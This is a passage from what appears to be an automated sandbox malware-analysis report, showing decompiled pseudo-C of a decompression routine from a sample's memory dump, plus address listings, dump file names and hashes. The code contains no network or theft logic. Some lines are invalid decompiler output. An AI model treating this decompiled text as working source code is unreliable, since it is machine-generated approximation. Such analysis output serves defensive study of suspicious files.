                          								 *(__ebp - 0x7c) = 0x14;
                          								goto L145;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							 *(__ebp - 0x30) = 8;
                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          							L130:
                          							 *(__ebp - 0x58) = __eax;
                          							 *(__ebp - 0x40) = 3;
                          							goto L144;
                          						case 0x14:
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          							__eax =  *(__ebp - 0x80);
                          							goto L140;
                          						case 0x15:
                          							__eax = 0;
                          							__eflags =  *(__ebp - 0x38) - 7;
                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          							__al = __al & 0x000000fd;
                          							__eax = (__eflags >= 0) - 1 + 0xb;
                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          							goto L120;
                          						case 0x16:
                          							__eax =  *(__ebp - 0x30);
                          							__eflags = __eax - 4;
                          							if(__eax >= 4) {
                          								_push(3);
                          								_pop(__eax);
                          							}
                          							__ecx =  *(__ebp - 4);
                          							 *(__ebp - 0x40) = 6;
                          							__eax = __eax << 7;
                          							 *(__ebp - 0x7c) = 0x19;
                          							 *(__ebp - 0x58) = __eax;
                          							goto L145;
                          						case 0x17:
                          							L145:
                          							__eax =  *(__ebp - 0x40);
                          							 *(__ebp - 0x50) = 1;
                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          							goto L149;
                          						case 0x18:
                          							L146:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x18;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t484 = __ebp - 0x70;
                          							 *_t484 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t484;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L148:
                          							_t487 = __ebp - 0x48;
                          							 *_t487 =  *(__ebp - 0x48) - 1;
                          							__eflags =  *_t487;
                          							L149:
                          							__eflags =  *(__ebp - 0x48);
                          							if( *(__ebp - 0x48) <= 0) {
                          								__ecx =  *(__ebp - 0x40);
                          								__ebx =  *(__ebp - 0x50);
                          								0 = 1;
                          								__eax = 1 << __cl;
                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          								__eax =  *(__ebp - 0x7c);
                          								 *(__ebp - 0x44) = __ebx;
                          								goto L140;
                          							}
                          							__eax =  *(__ebp - 0x50);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          							__eax =  *(__ebp - 0x58);
                          							__esi = __edx + __eax;
                          							 *(__ebp - 0x54) = __esi;
                          							__ax =  *__esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								__cx = __ax >> 5;
                          								__eax = __eax - __ecx;
                          								__edx = __edx + 1;
                          								__eflags = __edx;
                          								 *__esi = __ax;
                          								 *(__ebp - 0x50) = __edx;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L148;
                          							} else {
                          								goto L146;
                          							}
                          						case 0x19:
                          							__eflags = __ebx - 4;
                          							if(__ebx < 4) {
                          								 *(__ebp - 0x2c) = __ebx;
                          								L119:
                          								_t393 = __ebp - 0x2c;
                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                          								__eflags =  *_t393;
                          								L120:
                          								__eax =  *(__ebp - 0x2c);
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          									goto L170;
                          								}
                          								__eflags = __eax -  *(__ebp - 0x60);
                          								if(__eax >  *(__ebp - 0x60)) {
                          									goto L171;
                          								}
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          								__eax =  *(__ebp - 0x30);
                          								_t400 = __ebp - 0x60;
                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          								__eflags =  *_t400;
                          								goto L123;
                          							}
                          							__ecx = __ebx;
                          							__eax = __ebx;
                          							__ecx = __ebx >> 1;
                          							__eax = __ebx & 0x00000001;
                          							__ecx = (__ebx >> 1) - 1;
                          							__al = __al | 0x00000002;
                          							__eax = (__ebx & 0x00000001) << __cl;
                          							__eflags = __ebx - 0xe;
                          							 *(__ebp - 0x2c) = __eax;
                          							if(__ebx >= 0xe) {
                          								__ebx = 0;
                          								 *(__ebp - 0x48) = __ecx;
                          								L102:
                          								__eflags =  *(__ebp - 0x48);
                          								if( *(__ebp - 0x48) <= 0) {
                          									__eax = __eax + __ebx;
                          									 *(__ebp - 0x40) = 4;
                          									 *(__ebp - 0x2c) = __eax;
                          									__eax =  *(__ebp - 4);
                          									__eax =  *(__ebp - 4) + 0x644;
                          									__eflags = __eax;
                          									L108:
                          									__ebx = 0;
                          									 *(__ebp - 0x58) = __eax;
                          									 *(__ebp - 0x50) = 1;
                          									 *(__ebp - 0x44) = 0;
                          									 *(__ebp - 0x48) = 0;
                          									L112:
                          									__eax =  *(__ebp - 0x40);
                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          										_t391 = __ebp - 0x2c;
                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          										__eflags =  *_t391;
                          										goto L119;
                          									}
                          									__eax =  *(__ebp - 0x50);
                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          									__eax =  *(__ebp - 0x58);
                          									__esi = __edi + __eax;
                          									 *(__ebp - 0x54) = __esi;
                          									__ax =  *__esi;
                          									__ecx = __ax & 0x0000ffff;
                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          									__eflags =  *(__ebp - 0xc) - __edx;
                          									if( *(__ebp - 0xc) >= __edx) {
                          										__ecx = 0;
                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          										__ecx = 1;
                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          										__ebx = 1;
                          										__ecx =  *(__ebp - 0x48);
                          										__ebx = 1 << __cl;
                          										__ecx = 1 << __cl;
                          										__ebx =  *(__ebp - 0x44);
                          										__ebx =  *(__ebp - 0x44) | __ecx;
                          										__cx = __ax;
                          										__cx = __ax >> 5;
                          										__eax = __eax - __ecx;
                          										__edi = __edi + 1;
                          										__eflags = __edi;
                          										 *(__ebp - 0x44) = __ebx;
                          										 *__esi = __ax;
                          										 *(__ebp - 0x50) = __edi;
                          									} else {
                          										 *(__ebp - 0x10) = __edx;
                          										0x800 = 0x800 - __ecx;
                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          										 *__esi = __dx;
                          									}
                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                          									if( *(__ebp - 0x10) >= 0x1000000) {
                          										L111:
                          										_t368 = __ebp - 0x48;
                          										 *_t368 =  *(__ebp - 0x48) + 1;
                          										__eflags =  *_t368;
                          										goto L112;
                          									} else {
                          										goto L109;
                          									}
                          								}
                          								__ecx =  *(__ebp - 0xc);
                          								__ebx = __ebx + __ebx;
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          								 *(__ebp - 0x44) = __ebx;
                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          									__ecx =  *(__ebp - 0x10);
                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          									__ebx = __ebx | 0x00000001;
                          									__eflags = __ebx;
                          									 *(__ebp - 0x44) = __ebx;
                          								}
                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                          								if( *(__ebp - 0x10) >= 0x1000000) {
                          									L101:
                          									_t338 = __ebp - 0x48;
                          									 *_t338 =  *(__ebp - 0x48) - 1;
                          									__eflags =  *_t338;
                          									goto L102;
                          								} else {
                          									goto L99;
                          								}
                          							}
                          							__edx =  *(__ebp - 4);
                          							__eax = __eax - __ebx;
                          							 *(__ebp - 0x40) = __ecx;
                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          							goto L108;
                          						case 0x1a:
                          							goto L55;
                          						case 0x1b:
                          							L75:
                          							__eflags =  *(__ebp - 0x64);
                          							if( *(__ebp - 0x64) == 0) {
                          								 *(__ebp - 0x88) = 0x1b;
                          								goto L170;
                          							}
                          							__eax =  *(__ebp - 0x14);
                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          							__eflags = __eax -  *(__ebp - 0x74);
                          							if(__eax >=  *(__ebp - 0x74)) {
                          								__eax = __eax +  *(__ebp - 0x74);
                          								__eflags = __eax;
                          							}
                          							__edx =  *(__ebp - 8);
                          							__cl =  *(__eax + __edx);
                          							__eax =  *(__ebp - 0x14);
                          							 *(__ebp - 0x5c) = __cl;
                          							 *(__eax + __edx) = __cl;
                          							__eax = __eax + 1;
                          							__edx = 0;
                          							_t274 = __eax %  *(__ebp - 0x74);
                          							__eax = __eax /  *(__ebp - 0x74);
                          							__edx = _t274;
                          							__eax =  *(__ebp - 0x68);
                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          							_t283 = __ebp - 0x64;
                          							 *_t283 =  *(__ebp - 0x64) - 1;
                          							__eflags =  *_t283;
                          							 *( *(__ebp - 0x68)) = __cl;
                          							goto L79;
                          						case 0x1c:
                          							while(1) {
                          								L123:
                          								__eflags =  *(__ebp - 0x64);
                          								if( *(__ebp - 0x64) == 0) {
                          									break;
                          								}
                          								__eax =  *(__ebp - 0x14);
                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          								__eflags = __eax -  *(__ebp - 0x74);
                          								if(__eax >=  *(__ebp - 0x74)) {
                          									__eax = __eax +  *(__ebp - 0x74);
                          									__eflags = __eax;
                          								}
                          								__edx =  *(__ebp - 8);
                          								__cl =  *(__eax + __edx);
                          								__eax =  *(__ebp - 0x14);
                          								 *(__ebp - 0x5c) = __cl;
                          								 *(__eax + __edx) = __cl;
                          								__eax = __eax + 1;
                          								__edx = 0;
                          								_t414 = __eax %  *(__ebp - 0x74);
                          								__eax = __eax /  *(__ebp - 0x74);
                          								__edx = _t414;
                          								__eax =  *(__ebp - 0x68);
                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          								__eflags =  *(__ebp - 0x30);
                          								 *( *(__ebp - 0x68)) = __cl;
                          								 *(__ebp - 0x14) = __edx;
                          								if( *(__ebp - 0x30) > 0) {
                          									continue;
                          								} else {
                          									goto L80;
                          								}
                          							}
                          							 *(__ebp - 0x88) = 0x1c;
                          							goto L170;
                          					}
                          				}
                          			}













                          0x00000000
                          0x00406bfe
                          0x00406bfe
                          0x00406c03
                          0x00406c7a
                          0x00406c81
                          0x00406c8b
                          0x0040726a
                          0x0040726a
                          0x0040726d
                          0x0040726d
                          0x00407273
                          0x00407279
                          0x0040727f
                          0x00407299
                          0x0040729c
                          0x004072a2
                          0x004072ad
                          0x004072af
                          0x00407281
                          0x00407281
                          0x00407290
                          0x00407294
                          0x00407294
                          0x004072b9
                          0x004072e0
                          0x004072e0
                          0x004072e6
                          0x004072e6
                          0x00000000
                          0x004072bb
                          0x004072bb
                          0x004072bf
                          0x0040746e
                          0x00000000
                          0x0040746e
                          0x004072cb
                          0x004072d2
                          0x004072da
                          0x004072dd
                          0x00000000
                          0x004072dd
                          0x00406c05
                          0x00406c05
                          0x00406c09
                          0x00406c11
                          0x00406c14
                          0x00406c16
                          0x00406c19
                          0x00406c1b
                          0x00406c20
                          0x00406c23
                          0x00406c2a
                          0x00406c31
                          0x00406c34
                          0x00406c3f
                          0x00406c47
                          0x00406c47
                          0x00406c41
                          0x00406c41
                          0x00406c41
                          0x00406c36
                          0x00406c36
                          0x00406c36
                          0x00406c4e
                          0x00406c6c
                          0x00406c6e
                          0x00406e41
                          0x00406e41
                          0x00406e44
                          0x00406e47
                          0x00406e4a
                          0x00406e4d
                          0x00406e50
                          0x00406e53
                          0x00406e56
                          0x00406e59
                          0x00406e5f
                          0x00406e77
                          0x00406e7a
                          0x00406e7d
                          0x00406e80
                          0x00406e80
                          0x00406e83
                          0x00406e89
                          0x00406e61
                          0x00406e61
                          0x00406e69
                          0x00406e6e
                          0x00406e70
                          0x00406e72
                          0x00406e72
                          0x00406e93
                          0x00406e96
                          0x00406e39
                          0x00406e3f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406e98
                          0x00406e14
                          0x00406e18
                          0x00407420
                          0x00000000
                          0x00407420
                          0x00406e1e
                          0x00406e21
                          0x00406e24
                          0x00406e28
                          0x00406e2b
                          0x00406e31
                          0x00406e33
                          0x00406e33
                          0x00406e36
                          0x00000000
                          0x00406e36
                          0x00406c50
                          0x00406c50
                          0x00406c53
                          0x00406c59
                          0x00406c5b
                          0x00406c5b
                          0x00406c5e
                          0x00406c61
                          0x00406c63
                          0x00406c64
                          0x00406c67
                          0x00406cd4
                          0x00406cd4
                          0x00406cd8
                          0x00406cdb
                          0x00406cde
                          0x00406ce1
                          0x00406ce4
                          0x00406ce5
                          0x00406ce8
                          0x00406cea
                          0x00406cf0
                          0x00406cf3
                          0x00406cf6
                          0x00406cf9
                          0x00406cfc
                          0x00406d02
                          0x00406d1e
                          0x00406d21
                          0x00406d24
                          0x00406d27
                          0x00406d2e
                          0x00406d34
                          0x00406d38
                          0x00406d04
                          0x00406d04
                          0x00406d08
                          0x00406d10
                          0x00406d15
                          0x00406d17
                          0x00406d19
                          0x00406d19
                          0x00406d42
                          0x00406d45
                          0x00406cbc
                          0x00406cbc
                          0x00406cc2
                          0x00406d75
                          0x00406d7b
                          0x00000000
                          0x00000000
                          0x00406d7d
                          0x00406d80
                          0x00406d83
                          0x00406d86
                          0x00406d89
                          0x00406d8c
                          0x00406d8f
                          0x00406d92
                          0x00406d95
                          0x00406d9b
                          0x00406db3
                          0x00406db6
                          0x00406db9
                          0x00406dbc
                          0x00406dbc
                          0x00406dbf
                          0x00406dc5
                          0x00406d9d
                          0x00406d9d
                          0x00406da5
                          0x00406daa
                          0x00406dac
                          0x00406dae
                          0x00406dae
                          0x00406dcf
                          0x00406dd2
                          0x00406d50
                          0x00406d54
                          0x00407414
                          0x00000000
                          0x00407414
                          0x00406d5a
                          0x00406d5d
                          0x00406d60
                          0x00406d64
                          0x00406d67
                          0x00406d6d
                          0x00406d6f
                          0x00406d6f
                          0x00406d72
                          0x00406d72
                          0x00406dd2
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00406ddd
                          0x00406ddd
                          0x00406de0
                          0x00406de3
                          0x00406de7
                          0x0040742c
                          0x00000000
                          0x0040742c
                          0x00406ded
                          0x00406df0
                          0x00406df3
                          0x00406df6
                          0x00406df9
                          0x00406dfc
                          0x00406dff
                          0x00406e01
                          0x00406e04
                          0x00406e07
                          0x00406e0a
                          0x00406e0c
                          0x00406e0c
                          0x00406e0c
                          0x00406fa9
                          0x00406fa9
                          0x00406fac
                          0x00406fac
                          0x00000000
                          0x00406fac
                          0x00406cce
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406d4b
                          0x00406c97
                          0x00406c9b
                          0x00407408
                          0x00407484
                          0x0040748c
                          0x00407493
                          0x00407495
                          0x0040749c
                          0x004074a0
                          0x004074a0
                          0x00406ca1
                          0x00406ca4
                          0x00406ca7
                          0x00406cab
                          0x00406cae
                          0x00406cb4
                          0x00406cb6
                          0x00406cb6
                          0x00406cb9
                          0x00000000
                          0x00406cb9
                          0x00406d45
                          0x00406c4e
                          0x00406a82
                          0x00406a82
                          0x00406a8b
                          0x00407499
                          0x00407499
                          0x00000000
                          0x00407499
                          0x00406a91
                          0x00000000
                          0x00406a9c
                          0x00000000
                          0x00000000
                          0x00406aa5
                          0x00406aa8
                          0x00406aab
                          0x00406aaf
                          0x00000000
                          0x00000000
                          0x00406ab5
                          0x00406ab8
                          0x00406aba
                          0x00406abb
                          0x00406abe
                          0x00406ac0
                          0x00406ac1
                          0x00406ac3
                          0x00406ac6
                          0x00406acb
                          0x00406ad0
                          0x00406ad9
                          0x00406aec
                          0x00406aef
                          0x00406afb
                          0x00406b23
                          0x00406b25
                          0x00406b33
                          0x00406b33
                          0x00406b37
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406b27
                          0x00406b27
                          0x00406b2a
                          0x00406b2b
                          0x00406b2b
                          0x00000000
                          0x00406b27
                          0x00406b01
                          0x00406b06
                          0x00406b06
                          0x00406b0f
                          0x00406b17
                          0x00406b1a
                          0x00000000
                          0x00406b20
                          0x00406b20
                          0x00000000
                          0x00406b20
                          0x00000000
                          0x00406b3d
                          0x00406b3d
                          0x00406b41
                          0x004073ed
                          0x00000000
                          0x004073ed
                          0x00406b4a
                          0x00406b5a
                          0x00406b5d
                          0x00406b60
                          0x00406b60
                          0x00406b60
                          0x00406b63
                          0x00406b67
                          0x00000000
                          0x00000000
                          0x00406b69
                          0x00406b6f
                          0x00406b99
                          0x00406b9f
                          0x00406ba6
                          0x00000000
                          0x00406ba6
                          0x00406b75
                          0x00406b78
                          0x00406b7d
                          0x00406b7d
                          0x00406b88
                          0x00406b90
                          0x00406b93
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406bd8
                          0x00406bde
                          0x00406be1
                          0x00406bee
                          0x00406bf6
                          0x00000000
                          0x00000000
                          0x00406bad
                          0x00406bad
                          0x00406bb1
                          0x004073fc
                          0x00000000
                          0x004073fc
                          0x00406bbd
                          0x00406bc8
                          0x00406bc8
                          0x00406bc8
                          0x00406bcb
                          0x00406bce
                          0x00406bd1
                          0x00406bd6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406e9d
                          0x00406ea1
                          0x00406ebf
                          0x00406ec2
                          0x00406ec9
                          0x00406ecc
                          0x00406ecf
                          0x00406ed2
                          0x00406ed5
                          0x00406ed8
                          0x00406eda
                          0x00406ee1
                          0x00406ee2
                          0x00406ee4
                          0x00406ee7
                          0x00406eea
                          0x00406eed
                          0x00406eed
                          0x00406ef2
                          0x00000000
                          0x00406ef2
                          0x00406ea3
                          0x00406ea6
                          0x00406ea9
                          0x00406eb3
                          0x00000000
                          0x00000000
                          0x00406f07
                          0x00406f0b
                          0x00406f2e
                          0x00406f31
                          0x00406f34
                          0x00406f3e
                          0x00406f0d
                          0x00406f0d
                          0x00406f10
                          0x00406f13
                          0x00406f16
                          0x00406f23
                          0x00406f26
                          0x00406f26
                          0x00000000
                          0x00000000
                          0x00406f4a
                          0x00406f4e
                          0x00000000
                          0x00000000
                          0x00406f54
                          0x00406f58
                          0x00000000
                          0x00000000
                          0x00406f5e
                          0x00406f60
                          0x00406f64
                          0x00406f64
                          0x00406f67
                          0x00406f6b
                          0x00000000
                          0x00000000
                          0x00406fbb
                          0x00406fbf
                          0x00406fc6
                          0x00406fc9
                          0x00406fcc
                          0x00406fd6
                          0x00000000
                          0x00406fd6
                          0x00406fc1
                          0x00000000
                          0x00000000
                          0x00406fe2
                          0x00406fe6
                          0x00406fed
                          0x00406ff0
                          0x00406ff3
                          0x00406fe8
                          0x00406fe8
                          0x00406fe8
                          0x00406ff6
                          0x00406ff9
                          0x00406ffc
                          0x00406ffc
                          0x00406fff
                          0x00407002
                          0x00407005
                          0x00407005
                          0x00407008
                          0x0040700f
                          0x00407014
                          0x00000000
                          0x00000000
                          0x004070a2
                          0x004070a2
                          0x004070a6
                          0x00407444
                          0x00000000
                          0x00407444
                          0x004070ac
                          0x004070af
                          0x004070b2
                          0x004070b6
                          0x004070b9
                          0x004070bf
                          0x004070c1
                          0x004070c1
                          0x004070c1
                          0x004070c4
                          0x004070c7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00407125
                          0x00407125
                          0x00407129
                          0x00407450
                          0x00000000
                          0x00407450
                          0x0040712f
                          0x00407132
                          0x00407135
                          0x00407139
                          0x0040713c
                          0x00407142
                          0x00407144
                          0x00407144
                          0x00407144
                          0x00407147
                          0x00000000
                          0x00000000
                          0x00406ef5
                          0x00406ef5
                          0x00406ef8
                          0x00000000
                          0x00000000
                          0x00407234
                          0x00407238
                          0x0040725a
                          0x0040725d
                          0x00407267
                          0x00000000
                          0x00407267
                          0x0040723a
                          0x0040723d
                          0x00407241
                          0x00407244
                          0x00407244
                          0x00407247
                          0x00000000
                          0x00000000
                          0x004072f1
                          0x004072f5
                          0x00407313
                          0x00407313
                          0x00407313
                          0x0040731a
                          0x00407321
                          0x00407328
                          0x00407328
                          0x00000000
                          0x00407328
                          0x004072f7
                          0x004072fa
                          0x004072fd
                          0x00407300
                          0x00407307
                          0x0040724b
                          0x0040724b
                          0x0040724e
                          0x00000000
                          0x00000000
                          0x004073e2
                          0x004073e5
                          0x00000000
                          0x00000000
                          0x0040701c
                          0x0040701e
                          0x00407025
                          0x00407026
                          0x00407028
                          0x0040702b
                          0x00000000
                          0x00000000
                          0x00407033
                          0x00407036
                          0x00407039
                          0x0040703b
                          0x0040703d
                          0x0040703d
                          0x0040703e
                          0x00407041
                          0x00407048
                          0x0040704b
                          0x00407059
                          0x00000000
                          0x00000000
                          0x0040732f
                          0x0040732f
                          0x00407332
                          0x00407339
                          0x00000000
                          0x00000000
                          0x0040733e
                          0x0040733e
                          0x00407342
                          0x0040747a
                          0x00000000
                          0x0040747a
                          0x00407348
                          0x0040734b
                          0x0040734e
                          0x00407352
                          0x00407355
                          0x0040735b
                          0x0040735d
                          0x0040735d
                          0x0040735d
                          0x00407360
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407366
                          0x00407366
                          0x0040736a
                          0x004073ca
                          0x004073cd
                          0x004073d2
                          0x004073d3
                          0x004073d5
                          0x004073d7
                          0x004073da
                          0x00000000
                          0x004073da
                          0x0040736c
                          0x00407372
                          0x00407375
                          0x00407378
                          0x0040737b
                          0x0040737e
                          0x00407381
                          0x00407384
                          0x00407387
                          0x0040738a
                          0x0040738d
                          0x004073a6
                          0x004073a9
                          0x004073ac
                          0x004073af
                          0x004073b3
                          0x004073b5
                          0x004073b5
                          0x004073b6
                          0x004073b9
                          0x0040738f
                          0x0040738f
                          0x00407397
                          0x0040739c
                          0x0040739e
                          0x004073a1
                          0x004073a1
                          0x004073bc
                          0x004073c3
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x00407061
                          0x00407064
                          0x0040709a
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071cd
                          0x004071cd
                          0x004071d0
                          0x004071d2
                          0x0040745c
                          0x00000000
                          0x0040745c
                          0x004071d8
                          0x004071db
                          0x00000000
                          0x00000000
                          0x004071e1
                          0x004071e5
                          0x004071e8
                          0x004071e8
                          0x004071e8
                          0x00000000
                          0x004071e8
                          0x00407066
                          0x00407068
                          0x0040706a
                          0x0040706c
                          0x0040706f
                          0x00407070
                          0x00407072
                          0x00407074
                          0x00407077
                          0x0040707a
                          0x00407090
                          0x00407095
                          0x004070cd
                          0x004070cd
                          0x004070d1
                          0x004070fd
                          0x004070ff
                          0x00407106
                          0x00407109
                          0x0040710c
                          0x0040710c
                          0x00407111
                          0x00407111
                          0x00407113
                          0x00407116
                          0x0040711d
                          0x00407120
                          0x0040714d
                          0x0040714d
                          0x00407150
                          0x00407153
                          0x004071c7
                          0x004071c7
                          0x004071c7
                          0x00000000
                          0x004071c7
                          0x00407155
                          0x0040715b
                          0x0040715e
                          0x00407161
                          0x00407164
                          0x00407167
                          0x0040716a
                          0x0040716d
                          0x00407170
                          0x00407173
                          0x00407176
                          0x0040718f
                          0x00407191
                          0x00407194
                          0x00407195
                          0x00407198
                          0x0040719a
                          0x0040719d
                          0x0040719f
                          0x004071a1
                          0x004071a4
                          0x004071a6
                          0x004071a9
                          0x004071ad
                          0x004071af
                          0x004071af
                          0x004071b0
                          0x004071b3
                          0x004071b6
                          0x00407178
                          0x00407178
                          0x00407180
                          0x00407185
                          0x00407187
                          0x0040718a
                          0x0040718a
                          0x004071b9
                          0x004071c0
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x00000000
                          0x004071c2
                          0x00000000
                          0x004071c2
                          0x004071c0
                          0x004070d3
                          0x004070d6
                          0x004070d8
                          0x004070db
                          0x004070de
                          0x004070e1
                          0x004070e3
                          0x004070e6
                          0x004070e9
                          0x004070e9
                          0x004070ec
                          0x004070ec
                          0x004070ef
                          0x004070f6
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x00000000
                          0x004070f8
                          0x00000000
                          0x004070f8
                          0x004070f6
                          0x0040707c
                          0x0040707f
                          0x00407081
                          0x00407084
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406f6e
                          0x00406f6e
                          0x00406f72
                          0x00407438
                          0x00000000
                          0x00407438
                          0x00406f78
                          0x00406f7b
                          0x00406f7e
                          0x00406f81
                          0x00406f83
                          0x00406f83
                          0x00406f83
                          0x00406f86
                          0x00406f89
                          0x00406f8c
                          0x00406f8f
                          0x00406f92
                          0x00406f95
                          0x00406f96
                          0x00406f98
                          0x00406f98
                          0x00406f98
                          0x00406f9b
                          0x00406f9e
                          0x00406fa1
                          0x00406fa4
                          0x00406fa4
                          0x00406fa4
                          0x00406fa7
                          0x00000000
                          0x00000000
                          0x004071eb
                          0x004071eb
                          0x004071eb
                          0x004071ef
                          0x00000000
                          0x00000000
                          0x004071f5
                          0x004071f8
                          0x004071fb
                          0x004071fe
                          0x00407200
                          0x00407200
                          0x00407200
                          0x00407203
                          0x00407206
                          0x00407209
                          0x0040720c
                          0x0040720f
                          0x00407212
                          0x00407213
                          0x00407215
                          0x00407215
                          0x00407215
                          0x00407218
                          0x0040721b
                          0x0040721e
                          0x00407221
                          0x00407224
                          0x00407228
                          0x0040722a
                          0x0040722d
                          0x00000000
                          0x0040722f
                          0x00000000
                          0x0040722f
                          0x0040722d
                          0x00407462
                          0x00000000
                          0x00000000
                          0x00406a91

                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                          • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                          • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                          • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
